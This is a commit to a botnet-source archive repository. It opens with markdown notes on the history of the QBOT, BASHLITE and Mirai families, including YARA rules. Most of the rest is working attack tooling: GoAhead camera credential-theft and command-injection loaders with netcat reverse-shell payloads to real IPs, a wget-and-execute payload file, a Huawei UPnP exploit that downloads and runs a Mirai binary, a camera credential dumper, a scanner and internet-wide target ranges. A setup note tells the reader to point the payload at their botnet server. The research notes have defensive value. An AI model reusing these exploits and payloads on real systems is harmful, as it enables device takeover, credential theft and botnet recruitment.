Commit TL-BOTS

QBOT_HISTORY.md

@@ -0,0 +1,103 @@
+## Etymology: QBOT / P2P / BASHLITE
+
+Sources categorized under TL.P2P/P2P.* are from an older set of files that were then organized. 
+The sources categorized under QBOT.* are similar in many ways to the P2P sources. 
+
+They both trace origins back to the BASHLITE family of malware, originally authored by 
+LizardSquad for DDoS purposes. BASHLITE could also be found under the names Gafgyt, 
+Lizkebab, Qbot, Torlus and LizardStresser, among many others.
+
+The original version of these was written to exploit the ShellShock vulnerability in 
+embedded Linux devices running BusyBox around 2014. After the source was leaked, it caused 
+endless variants of dubious quality to be be released, which is what you see here. 
+
+One way to differentiate an older BASHLITE/P2P/QBOT source is by the use of the Ogre figlet
+font in the comments to seperate the different sections of the source file. Example:
+
+    //     ___      __ _
+    //    /   \___ / _(_)_ __   ___  ___
+    //   / /\ / _ \ |_| | '_ \ / _ \/ __|
+    //  / /_//  __/  _| | | | |  __/\__ \
+    // /___,' \___|_| |_|_| |_|\___||___/
+
+A near universal feature of these bots is the use of a Multiply-with-carry PRNG based on the constant PHI:
+
+    #define PHI 0x9e3779b9
+
+This can be used as a signature for identification, summarized by these yara rules.
+
+    rule phiLE : QBOT {
+    meta:
+      Author = "u"
+      Description = "Checks for PHI-based PRNG - Little Endian"
+    strings:
+      $phi0 = {b9 79 37 9e}
+    condition:
+      $phi0
+    }
+    rule phiBE : QBOT {
+    meta:
+      Author = "u"
+      Description = "Checks for PHI-based PRNG - Big Endian"
+    strings:
+      $phi0 = {9e 37 79 b9}
+    condition:
+      $phi0
+    }
+
+Important Note: The term QBOT in this context is different from the QBOT or QAKBOT 
+banking malware, which has been around for many years prior to these sources. 
+
+## Etymology: MIRAI 
+
+Mirai first appeared in August 2016 and has been covered extensively by numerous outlets. 
+The collection of Mirai variants here represents a similar development pattern to the 
+evolution of the BASHLITE/QBOT/P2P bots as detailed above.
+
+While a good number of elements are shared between current variants of QBOT and MIRAI,
+a distinguishing feature of MIRAI is the command and control server structure that is 
+written in Go and has a more streamlined method of managing tasks and bots. 
+
+Since earlier IoT malware relied generally on having single source files to represent 
+a server, a client, and a script to cross compile for different architectures, the 
+codebase for Mirai is markedly more robust. The sources for bots in Mirai are generally 
+still written in C, but there is a greater deal of organization of various modules, 
+allowing for much more rapid extension of bot capabilities.
+
+## Targets 
+
+Modern MIRAI and QBOT sources target a core set of processor architectures used in IoT 
+devices. They also use a very standard set of cross compilation tools and an easily 
+configurable toolchain.
+
+Table of targets 
+
+* arm
+* arm4
+* arm5
+* arm6
+* arm7
+* m68k
+* mips
+* mpsl
+* ppc
+* sh4
+* spc
+* x86
+* x86_32
+* x86_64
+
+## Exploits 
+
+The BASHLITE malware family originally exploited ShellShock, but in the years since, 
+new exploits for embedded devices have inevitably appeared, leading to a much larger 
+variety of exploits being deployed by a given botnet. 
+
+Many of these are standard, publicly known exploits. In an attempt to appear to have 
+an unknown or "private" exploit, some botnet owners attempt to sell modified versions 
+of public exploits with very basic obfuscation in order to trick an inexperienced
+malware author into purchasing it.
+
+Some exploits are also backdoored themselves, containing tricks to add users to the C2 
+and to the bots.
+

README.md

@@ -0,0 +1,76 @@
+# TL-BOTS #
+
+Welcome to the TL-BOTS repo. This collection contains source files, tools, and
+other components of a vast array of botnet families. The families covered here
+range from 2014/2015 to the present day.
+
+Files in this collection have been gathered via distributed trawling of the 
+internet, and deduplicated where applicable.
+
+## Disclaimer ##
+
+The files contained in this repo are for research purposes only. They are 
+provided as-is and have no guarantee of functionality.
+
+## What is a botnet? ##
+
+A botnet is a network of infected devices that contact a Command and Control 
+Server (C2) to receive instructions for attacks. Botnets are used for many 
+different purposes, including DDoS, fraud, and loading/spreading other malware.
+
+## Mitigations ##
+
+Mitigations vary from system to system, but the core security principles apply 
+to each of them. Regular patching, network segmentation, and proper device 
+configuration are crucial to maintaining the security of devices.
+
+## Navigating the Repo ##
+
+The repo is divided into several folders, containing specific categories of 
+activity.
+
+Zip files may have the same or similar names, so each filename contains an 
+identifier based on the first 6 characters of the SHA1 hash of the file. 
+The formula is:
+
+    FILENAME.SHA1.EXTENSION
+
+Non Zip files may contain this naming pattern as well.
+
+## Collection Highlights ## 
+
+Nearly every version of Mirai and QBot since the beginning of both of these 
+malware families is contained in this repo. For more information about the 
+origin of these malware families, check out HISTORY.md
+
+## Researching This Collection ## 
+
+This collection contains a vast number of botnets that have come and gone, 
+and others that are still around in some form. While the bots themselves 
+are steadily evolving, the core of many of them rely on exploiting whatever 
+low hanging fruit is available at the time. A more detailed analysis of this 
+collection, and resources to research further, is located in RESEARCH.md
+
+## Contributing ## 
+
+Contributions to this repo are welcome. Simply fork this repo, open a pull 
+request and consult with the repo maintainers about it. 
+
+### Guidelines ###
+
+- Please submit larger files (> 5 MB) as a zip file in order to make cloning this a reasonable exercise.
+- Please try and follow our naming convention for zip files in order to deduplicate and identify hashes. 
+
+Files are subject to rejection if they do not meet our guidelines.
+
+### We will NOT accept the following ###
+
+- Combolists
+- Database dumps
+- Any credentials for active sites or devices, user, admin or otherwise
+
+## Special Thanks ##
+
+Special thanks goes to GreyNoise.io, who has catalogued nearly every exploit used 
+in this collection. More information on using their tools to further research these 
+botnets is located in RESEARCH.md

RESEARCH.md

@@ -0,0 +1,137 @@
+## Researching Botnets ##
+
+There is a vast number of botnets featured in this repo, and there is an even 
+larger number of them not catalogued here. This document should hopefully shed 
+some light on what _is_ featured in this collection, and what you can do with 
+this information.
+
+## What is in this repo? ##
+
+This information is subject to change, but is generally what was initially 
+collected when this repo was created.
+
+#### TL.BOTNET ####
+
+These are botnets that may be merged with TL-TROJAN at a later date. There is 
+a variety of Trojans and other malware with a distinct botnet component.
+
+#### TL.EXPLOIT_SCAN ####
+
+This is a collection of Exploits, and Vulnerability Scanners used by botnet 
+maintainers.
+
+Scanners are to generate lists of vulnerable IPs by checking whether or not 
+they exhibit characteristics of a vulnerable device. In some cases, a scanner 
+may perform the intial loading of a payload (eg. downloading a script), or 
+other tactic to get an initial foothold, but this is not always the case.
+
+Exploits are the exploits that are actually performed on a list of devices. 
+They are usually python scripts, and either scan at random looking for a 
+vulnerable IP, or they process a list of IPs generated by a Scanner to attempt 
+to exploit them. Exploit scripts may at times contain a number of coding errors, 
+that are a dead giveaway for those inspecting the scope of a single botnet.
+
+#### TL.IRC ####
+
+This is a collection of IRC based botnets. This type of botnet relies on an 
+IRC server for command and control. They are less common now than they were 
+before, largely due to more modern C2 options available. Many early QBOT variants 
+were IRC based, and you may see some similarities in code to other botnets.
+
+#### TL.JS ####
+
+This is collection of nodeJS based botnets. They use a command and control 
+architecture developed in nodeJS. 
+
+#### TL.LISTS ####
+
+This information is available upon request.
+
+#### TL.MIRAI ####
+
+This is a collection of nearly every Mirai variant available until May 2019. 
+There may be additional variants out there, but given the sample size, there 
+are enough individual samples for a reasonable analysis.
+
+Each variant is sorted by name, and within each folder, there may be different 
+versions of a given variant.
+
+Some variants may contain custom versions of exploits, with elements such as 
+useragents, bot names, or other details that can aid in fingerprinting a given 
+version.
+
+#### TL.MISC ####
+
+This collection contains sub collections that don't quite fit into any of the 
+other categories. There are miscellaneous bots, tools, clients/servers, configs, 
+and other ephemera that may be useful for research, but overall don't stand out 
+enough on their own.
+
+There is also a BIN.Archive folder in TL.MISC that contains some sample binaries 
+from various bot campaigns in 2019 for research purposes.
+
+#### TL.P2P ####
+
+This collection contains some earlier versions of QBot malware that doesn't 
+quite fit into the QBot category. They may be more unique forks, or contain 
+elements from a completely different class of botnet. The variants in here 
+are typically much older, as P2P refers to the method of self-replication, that 
+was superceded by the slang term "self-rep". They may be treated as QBot-like, 
+for research purposes, but they are not typically deployed as often in the wild 
+due to relying on older self replication methods like simple telnet bruteforcing.
+
+#### TL.QBOT ####
+
+This collection contains many variants of the QBot family of malware. Dating all 
+the way from 2014, when the first iterations appeared under the Lizkebab/Torlus 
+names, up until today. The source is largely unchanged, but given the ease of set 
+up, and the "stability" of the source, this family of bots will likely be around 
+in some form for a while.
+
+#### TL.TOOLS ####
+
+This collection contains various tools and resources that have been included with 
+many botnet source releases.
+
+### Additional Information ###
+
+In QBOT_HISTORY.md, we briefly touched on the history of a major family of botnets 
+that was originally popularized when it was deployed by LizardSquad, and other 
+groups, to perform some well-known DDoS attacks around 2014/2015.
+
+Botnets in TL.BOTNET provide less of a historical resource, and more of an exhibition 
+of some diversity in modern botnets. Many of the families included, such as ZeuS, 
+have to continue to find new vectors through which to propagate. The source codes 
+for these are much more complex than the IoT botnet families, and target consumer 
+operating systems, rather than embedded. 
+
+## Informing the Present ##
+
+There are many ways to use the source code in this repo to understand the state of 
+botnets today. A multitude of tools and services exist for analyzing malware and
+how it spreads.
+
+### Using Greynoise ###
+
+GreyNoise has built a system that listens for traffic across the internet, and 
+records them for researchers, corporations, and others, to understand the 
+background noise of internet, and determine what they should be paying attention 
+to. Using GreyNoise, we can take what we have learned from these botnet sources, 
+tools, and exploits, and track what is still active in the wild. 
+
+With botnets, much of what we can see primarily relies on how the bots are 
+attempting to self-replicate, or how malicious actors are scanning to determine 
+whether or not a given system is exploitable. 
+
+GreyNoise has tagged a lot of malicious outgoing traffic based on various exploits 
+that have been used in the malware contained in this repo. Taking a look at their 
+[https://viz.greynoise.io/cheat-sheet/examples](cheatsheet), you can see that there are many ways to explore the dataset, and look 
+up where certain types of malware may be operating from.
+
+### Inhale ###
+
+Inhale is a tool written by @netspooky that was used to aggregrate and classify 
+a majority of the files you see in this repo. It uses a number of static analysis 
+techniques to enumerate data from a given file, and store that information for 
+further analysis. You can find out more information about using it [https://github.com/netspooky/inhale](here).
+

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/GoAHead Exploit/GoAHead Loader/goahead-loader.py

@@ -0,0 +1,131 @@
+import socket
+import sys
+import re
+import time
+from multiprocessing import Process
+
+def retrieve_credentials(host, port):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.settimeout(5)
+        sock.connect((host, int(port)))
+    except:
+        sock.close()
+        return 0
+    # Retrieved credentials
+    try:
+        sock.send("GET login.cgi HTTP/1.0\n\n")
+        resp = sock.recv(1024)
+        # Double receive
+        resp += sock.recv(1024)
+    except:
+        sock.close()
+        return 0
+    if not resp:
+        sock.close()
+        return 0
+    index = resp.find("var login")
+    done = resp[index:]
+    m = done.strip("\r\n")
+    l = m.split(" ")
+    if len(l) <= 1:
+        sock.close()
+        return 0
+    try:
+        preuser = l[1].strip("var \r\n")
+        prepass = l[2].strip("var \r\n")
+    except:
+        return 0
+    username = preuser[11:].strip('";')
+    password = prepass[11:].strip('";')
+    sock.close()
+    return username + ":" + password
+
+def submit_payload(host, port, payload):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.settimeout(5)
+        sock.connect((host, int(port)))
+    except:
+        sock.close()
+        return 0
+    try:
+        sock.send(payload)
+    except:
+        sock.close()
+        return 0
+    sock.close()
+    return 1
+
+def submit_payload2(host, port, payload):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.settimeout(5)
+        sock.connect((host, int(port)))
+    except:
+        sock.close()
+        return 0
+    try:
+        sock.send(payload)
+    except:
+        sock.close()
+        return 0
+    now = time.clock()
+    while (time.clock() - now) < 30:
+        try:
+            resp = sock.recv(1024)
+        except:
+            break
+        if not resp:
+            break
+        if "ok" in resp:
+            sock.close()
+            return 1
+    sock.close()
+    return 0
+
+def run(host, port):
+    ret = retrieve_credentials(host, port)
+    if ret == 0:
+        return
+    str = ret.split(":")
+    username = str[0]
+    password = str[1]
+    if username != "" and password != "":
+        print "Retrieved credentials %s:%s" % (str[0], str[1])
+    else:
+        return
+    # Continue assuming we've retrieved the credentials successfully
+    #payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+nexusiotsolutions.net+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
+    for i in open("file", "r").readlines():
+        line = i.strip("\r\n")
+        payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28" + line + "%29 HTTP/1.0\n\n"
+        ret = submit_payload(host, port, payload)
+        if ret == 0:
+            print "failed to send payload - %s (timeout?)" % (host)
+            return
+        payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)
+        ret = submit_payload2(host, port, payload2)
+        if ret == 0:
+            print "failed to send payload - %s (timeout?)" % (host)
+            return
+        """payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+37.48.99.233+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
+        ret = submit_payload(host, port, payload)
+        if ret == 0:
+        print "Failed to send initial payload"
+        return
+        print "Sent initial payload, building & preparing to send the second"
+        payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)
+        ret = submit_payload2(host, port, payload2)
+        if ret == 0:
+        print "Failed to send submit payload"
+        return"""
+
+if __name__ == "__main__":
+    for i in open("goahead", "r").readlines():
+        line = i.strip("\r\n")
+        info = line.split(":")
+        ip = info[0]
+        port = 81
+        p = Process(target=run, args=(ip,port,))
+        p.start()

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/GoAHead Exploit/loader.py

@@ -0,0 +1,131 @@
+import socket
+import sys
+import re
+import time
+from multiprocessing import Process
+
+def retrieve_credentials(host, port):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.settimeout(5)
+        sock.connect((host, int(port)))
+    except:
+        sock.close()
+        return 0
+    # Retrieved credentials
+    try:
+        sock.send("GET login.cgi HTTP/1.0\n\n")
+        resp = sock.recv(1024)
+        # Double receive
+        resp += sock.recv(1024)
+    except:
+        sock.close()
+        return 0
+    if not resp:
+        sock.close()
+        return 0
+    index = resp.find("var login")
+    done = resp[index:]
+    m = done.strip("\r\n")
+    l = m.split(" ")
+    if len(l) <= 1:
+        sock.close()
+        return 0
+    try:
+        preuser = l[1].strip("var \r\n")
+        prepass = l[2].strip("var \r\n")
+    except:
+        return 0
+    username = preuser[11:].strip('";')
+    password = prepass[11:].strip('";')
+    sock.close()
+    return username + ":" + password
+
+def submit_payload(host, port, payload):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.settimeout(5)
+        sock.connect((host, int(port)))
+    except:
+        sock.close()
+        return 0
+    try:
+        sock.send(payload)
+    except:
+        sock.close()
+        return 0
+    sock.close()
+    return 1
+
+def submit_payload2(host, port, payload):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.settimeout(5)
+        sock.connect((host, int(port)))
+    except:
+        sock.close()
+        return 0
+    try:
+        sock.send(payload)
+    except:
+        sock.close()
+        return 0
+    now = time.clock()
+    while (time.clock() - now) < 30:
+        try:
+            resp = sock.recv(1024)
+        except:
+            break
+        if not resp:
+            break
+        if "ok" in resp:
+            sock.close()
+            return 1
+    sock.close()
+    return 0
+
+def run(host, port):
+    ret = retrieve_credentials(host, port)
+    if ret == 0:
+        return
+    str = ret.split(":")
+    username = str[0]
+    password = str[1]
+    if username != "" and password != "":
+        print "Retrieved credentials %s:%s" % (str[0], str[1])
+    else:
+        return
+    # Continue assuming we've retrieved the credentials successfully
+    #payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+nexusiotsolutions.net+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
+    for i in open("payload_file", "r").readlines():
+        line = i.strip("\r\n")
+        payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginps=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28" + line + "%29 HTTP/1.0\n\n"
+        ret = submit_payload(host, port, payload)
+        if ret == 0:
+            print "failed to send payload - %s (timeout?)" % (host)
+            return
+        payload2 = "GET /ftptest.cgi?loginuse=%s&loginps=%s HTTP/1.0\n\n" % (username, password)
+        ret = submit_payload2(host, port, payload2)
+        if ret == 0:
+            print "failed to send payload - %s (timeout?)" % (host)
+            return
+    """payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+37.48.99.233+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
+    ret = submit_payload(host, port, payload)
+    if ret == 0:
+        print "Failed to send initial payload"
+        return
+    print "Sent initial payload, building & preparing to send the second"
+    payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)
+    ret = submit_payload2(host, port, payload2)
+    if ret == 0:
+        print "Failed to send submit payload"
+        return"""
+
+if __name__ == "__main__":
+    for i in open("goahead", "r").readlines():
+        line = i.strip("\r\n")
+        info = line.split(":")
+        ip = info[0]
+        port = 81
+        p = Process(target=run, args=(ip,port,))
+        p.start()

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/GoAHead Exploit/mklist.py

@@ -0,0 +1,79 @@
+#!/usr/bin/python
+import sys, time, os, ssl, socket
+from threading import Thread
+if len(sys.argv) < 3:
+	print "Usage: python "+sys.argv[0]+" <input> <threads> <output>"
+	sys.exit()
+ips = map(lambda s: s.strip(), open(sys.argv[1], "r").readlines())
+threads = int(sys.argv[2])
+thread_count = len(ips) / threads
+thread_chunks = [ips[x:x+thread_count] for x in xrange(0, len(ips), thread_count)]
+output = sys.argv[3]
+found = 0
+cons = 0
+fails = 0
+proc = 0
+port = 81
+buf = 4096
+
+headers = "GET /ftptest.cgi HTTP/1.0\r\n\r\n"
+
+def checkhost_headers(host):
+    global found
+    global cons
+    global fails
+    host = host.strip("\n")
+    cons += 1
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        try:
+            sock.settimeout(5)
+            sock.connect((host, port))
+        except:
+            failed += 1
+            sock.close()
+        sock.send(headers)
+        time.sleep(2)
+        resp = sock.recv(1024)
+        if "GoAhead-Webs" in resp:
+            file = open(output, "a+")
+            file.write(host+"\n")
+            file.close()
+            found += 1
+        sock.close()
+        cons -= 1
+    except:
+        cons -= 1
+        fails += 1
+        pass
+def worker(count):
+    global cons
+    global failed
+    global sent
+    global proc
+    global cons
+    count = int(count)
+    for i in thread_chunks[count]:
+        try:
+            proc += 1
+            checkhost_headers(i)
+        except:
+            pass
+for x in xrange(threads):
+    try:
+        t = Thread(target=worker, args=(x,))
+        t.start()
+    except KeyboardInterrupt:
+        sys.exit()
+    except:
+        pass
+while True:
+    try: #prints the information like how many devices its tried
+        i = found
+        sys.stdout.write("\r\033[33mProccessed \033[92m[\033[93m"+str(proc)+"\033[92m]\033[33m || \033[33mFound \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m || Conns \033[92m[\033[93m"+str(cons)+"\033[92m] || Fails \033[92m[\033[93m"+str(fails)+"\033[92m]\033[0m")
+        sys.stdout.flush()
+        time.sleep(0.25)
+    except KeyboardInterrupt:
+        sys.exit("Exiting On User Input")
+    except:
+        pass

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/GoAHead Exploit/payload file.txt

@@ -0,0 +1,6 @@
+rm+-rf+/tmp/*
+echo+-e+"cd+/tmp"+>+/tmp/exploit
+echo+-e+"wget+http:/\/1.3.3.7/x656"+>>+/tmp/exploit
+echo+-e+"chmod+777+/tmp/x656"+>>+/tmp/exploit
+echo+-e+"/tmp/x656+exploit"+>>+/tmp/exploit
+sh+/tmp/exploit

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/GoAHead Exploit/two.lst

@@ -0,0 +1,191 @@
+1.0.0.0/8
+2.0.0.0/8
+5.0.0.0/8
+8.0.0.0/8
+12.0.0.0/8
+14.0.0.0/8
+23.0.0.0/8
+24.0.0.0/8
+27.0.0.0/8
+31.0.0.0/8
+32.0.0.0/8
+35.0.0.0/8
+36.0.0.0/8
+37.0.0.0/8
+38.0.0.0/8
+39.0.0.0/8
+40.0.0.0/8
+41.0.0.0/8
+42.0.0.0/8
+43.0.0.0/8
+45.0.0.0/8
+46.0.0.0/8
+47.0.0.0/8
+49.0.0.0/8
+50.0.0.0/8
+51.0.0.0/8
+52.0.0.0/8
+54.0.0.0/8
+58.0.0.0/8
+59.0.0.0/8
+60.0.0.0/8
+61.0.0.0/8
+62.0.0.0/8
+63.0.0.0/8
+64.0.0.0/8
+65.0.0.0/8
+66.0.0.0/8
+67.0.0.0/8
+68.0.0.0/8
+69.0.0.0/8
+70.0.0.0/8
+71.0.0.0/8
+72.0.0.0/8
+73.0.0.0/8
+74.0.0.0/8
+75.0.0.0/8
+76.0.0.0/8
+77.0.0.0/8
+78.0.0.0/8
+79.0.0.0/8
+80.0.0.0/8
+81.0.0.0/8
+82.0.0.0/8
+83.0.0.0/8
+84.0.0.0/8
+85.0.0.0/8
+86.0.0.0/8
+87.0.0.0/8
+88.0.0.0/8
+89.0.0.0/8
+90.0.0.0/8
+91.0.0.0/8
+92.0.0.0/8
+93.0.0.0/8
+94.0.0.0/8
+95.0.0.0/8
+96.0.0.0/8
+97.0.0.0/8
+98.0.0.0/8
+99.0.0.0/8
+100.0.0.0/8
+101.0.0.0/8
+102.0.0.0/8
+103.0.0.0/8
+104.0.0.0/8
+105.0.0.0/8
+106.0.0.0/8
+107.0.0.0/8
+108.0.0.0/8
+109.0.0.0/8
+110.0.0.0/8
+111.0.0.0/8
+112.0.0.0/8
+113.0.0.0/8
+114.0.0.0/8
+115.0.0.0/8
+116.0.0.0/8
+117.0.0.0/8
+118.0.0.0/8
+119.0.0.0/8
+120.0.0.0/8
+121.0.0.0/8
+122.0.0.0/8
+123.0.0.0/8
+124.0.0.0/8
+125.0.0.0/8
+126.0.0.0/8
+128.0.0.0/8
+129.0.0.0/8
+130.0.0.0/8
+131.0.0.0/8
+132.0.0.0/8
+133.0.0.0/8
+134.0.0.0/8
+135.0.0.0/8
+136.0.0.0/8
+137.0.0.0/8
+138.0.0.0/8
+139.0.0.0/8
+140.0.0.0/8
+141.0.0.0/8
+142.0.0.0/8
+143.0.0.0/8
+144.0.0.0/8
+145.0.0.0/8
+146.0.0.0/8
+147.0.0.0/8
+148.0.0.0/8
+149.0.0.0/8
+150.0.0.0/8
+151.0.0.0/8
+152.0.0.0/8
+153.0.0.0/8
+154.0.0.0/8
+155.0.0.0/8
+156.0.0.0/8
+157.0.0.0/8
+158.0.0.0/8
+159.0.0.0/8
+160.0.0.0/8
+161.0.0.0/8
+162.0.0.0/8
+163.0.0.0/8
+164.0.0.0/8
+165.0.0.0/8
+166.0.0.0/8
+167.0.0.0/8
+168.0.0.0/8
+169.0.0.0/8
+170.0.0.0/8
+171.0.0.0/8
+172.0.0.0/8
+173.0.0.0/8
+174.0.0.0/8
+175.0.0.0/8
+176.0.0.0/8
+177.0.0.0/8
+178.0.0.0/8
+179.0.0.0/8
+180.0.0.0/8
+181.0.0.0/8
+182.0.0.0/8
+183.0.0.0/8
+184.0.0.0/8
+185.0.0.0/8
+186.0.0.0/8
+187.0.0.0/8
+188.0.0.0/8
+189.0.0.0/8
+190.0.0.0/8
+191.0.0.0/8
+192.0.0.0/8
+193.0.0.0/8
+194.0.0.0/8
+195.0.0.0/8
+196.0.0.0/8
+197.0.0.0/8
+198.0.0.0/8
+199.0.0.0/8
+200.0.0.0/8
+201.0.0.0/8
+202.0.0.0/8
+203.0.0.0/8
+204.0.0.0/8
+205.0.0.0/8
+206.0.0.0/8
+207.0.0.0/8
+208.0.0.0/8
+209.0.0.0/8
+210.0.0.0/8
+211.0.0.0/8
+212.0.0.0/8
+213.0.0.0/8
+216.0.0.0/8
+217.0.0.0/8
+218.0.0.0/8
+219.0.0.0/8
+220.0.0.0/8
+221.0.0.0/8
+222.0.0.0/8
+223.0.0.0/8

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Huawei-bigbots/READ ME.txt

@@ -0,0 +1,9 @@
+1: Open (huawei.py) and edit the (SERVER IP) to your botnet ip.
+2: Edit the mips named elf to whatever your mips are named in your cross compiler.
+3: Upload the files to your server and do (sh h.sh)
+ 
+ERROR FIXES:
+If it says no command zmap found well install zmap dumbass.
+If youre using centos use the zmap.sh file on my pastebin.
+If youre using anything other than centos do apt-get install zmap -y
+If not work nothing of that run on centos: yum install zmap -y

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Huawei-bigbots/huawei.py

@@ -0,0 +1,31 @@
+#! python !#
+import threading, sys, time, random, socket, re, os, struct, array, requests
+from threading import Thread
+from time import sleep
+import requests
+from requests.auth import HTTPDigestAuth
+from decimal import *
+ips = open(sys.argv[1], "r").readlines()
+cmd1 = "/bin/busybox wget -g 176.32.33.247 -l /tmp/hauwei -r /bins/kowai.mips"
+cmd2 = "chmod 777 /tmp/hauwei;/tmp/hauwei; rm -rf /tmp/hauwei"
+payload1 = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd1 + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
+payload2 = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd2 + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
+class rtek(threading.Thread):
+		def __init__ (self, ip):
+			threading.Thread.__init__(self)
+			self.ip = str(ip).rstrip('\n')
+		def run(self):
+			try:
+				print "[Huawei] Loading - " + self.ip
+				url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
+				requests.post(url, timeout=3, data=payload1, auth=HTTPDigestAuth('dslf-config', 'admin'))
+				requests.post(url, timeout=2.5, data=payload2, auth=HTTPDigestAuth('dslf-config', 'admin'))
+			except Exception as e:
+				pass
+for ip in ips:
+	try:
+		n = rtek(ip)
+		n.start()
+		time.sleep(0.03)
+	except:
+		pass

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Huawei-bigbots/zmap.sh

@@ -0,0 +1,16 @@
+yum update -y
+yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y
+yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y
+yum install epel-release -y
+yum install gengetopt -y
+wget https://github.com/zmap/zmap/archive/v2.1.0.tar.gz
+tar -xvf v2.1.0.tar.gz
+cd zmap-2.1.0
+flex -o "src/lexer.c" --header-file="src/lexer.h" "src/lexer.l"
+byacc -d -o "src/parser.c" "src/parser.y"
+mkdir /etc/zmap
+cp conf/* /etc/zmap
+cmake -DENABLE_HARDENING=ON
+make
+make install
+cd

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/IPcanexploit1.py

@@ -0,0 +1,77 @@
+import urllib.request, threading, socket, time, sys
+if len(sys.argv) != 2:
+	print("Correct useage: python " + sys.argv[0].split("\\").pop() + " <thread count> ")
+	sys.exit()
+	
+lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0
+
+# Open output.txt
+list = open("output.txt", "r")
+scan = list.read()
+list.close()
+
+scan = scan.split("\n")
+while "\n" in scan:
+	scan.remove("\n")
+pretotal = len(scan)
+def dumpcreds():
+	global finalprintout
+	global total
+	global scan
+	while len(scan) > 0:
+		try:
+			with lock:
+				ip = scan.pop()
+			with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response:
+				reply = str(response.read())
+				if reply.find("admin") != -1:
+					reply = reply[reply.find("admin"):]
+					while reply.find("\\x00") != -1:
+						reply = reply.replace("\\x00", "")
+					password = reply[5:reply.find("\\")]
+					if password.find("/") != -1:
+						password = password[:password.find("/")]
+					print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;35mFound\x1b[0;37m| admin:" + password + "@" + ip)
+					with lock:
+						finalprintout += ip + ":admin:" + password + "\n"
+						total += 1
+		except:
+			pass
+
+print("	\x1b[1;37m[\x1b[1;35m+\x1b[1;37m] \x1b[1;35mCCTV Camera Exploit \x1b[1;37m[\x1b[1;35m+\x1b[1;37m]\x1b[0m")
+print("	\x1b[1;37m[\x1b[1;31m*\x1b[1;37m] \x1b[1;36mCredits go to ★Cam★ \x1b[1;37m[\x1b[1;31m*\x1b[1;37m]")
+time.sleep(6)
+print("      \x1b[1;35mDumping Credentials, please wait")
+time.sleep(4)
+
+for i in range(0, threadcount+1):
+	threads.append(threading.Thread(target=dumpcreds))
+
+for thread in threads:
+	try:
+		thread.daemon = True
+		thread.start() 
+	except:
+		pass
+
+for thread in threads:
+	try:
+		thread.join()
+	except:
+		pass
+		
+while 1:
+	time.sleep(1)
+	done = False
+	for thread in threads:
